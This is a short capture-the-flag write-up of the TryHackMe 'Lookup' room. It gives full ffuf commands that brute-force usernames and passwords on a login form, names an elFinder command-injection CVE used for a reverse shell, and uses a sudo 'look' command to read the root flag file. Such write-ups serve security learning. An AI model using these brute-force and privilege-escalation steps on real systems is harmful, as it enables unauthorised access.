~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • THM lookup


    NMAP

    HTTP SSH

    HTTP goes immediately to a login page #### FFUF fuzzing username >ffuf -u ‘http://lookup.thm/login.php’ -H ‘Content-Type: application/x-www-form-urlencoded’ -X POST -d ‘username=FUZZ&password=test’ -w /usr/share/seclists/Usernames/Names/names.txt -mc all -ic -fs 74 -t 100

    Found: jose, admin

    FFUF fuzzing password

    ffuf -u ‘http://lookup.thm/login.php’ -H ‘Content-Type: application/x-www-form-urlencoded’ -X POST -d ‘username=jose&password=FUZZ’ -w /usr/share/wordlist/rockyou.txt -mc all -ic -fs 74 -t 100

    Password: password123

    elFinder CVE-2019-9194

    version: 2.1.47

    CVE-2019-9194 - command injection in PHP

    Reverse shell with msfconsole

    We find the user think in /home/think/. However, user.txt cannot be readed.

    think credentials

    user: think

    pw: josemario.AKA(think)

    sudo -l

    Shows that ‘look’ command has root priviledge

    look ’’ /root/root.txt

    throws out root flag that easy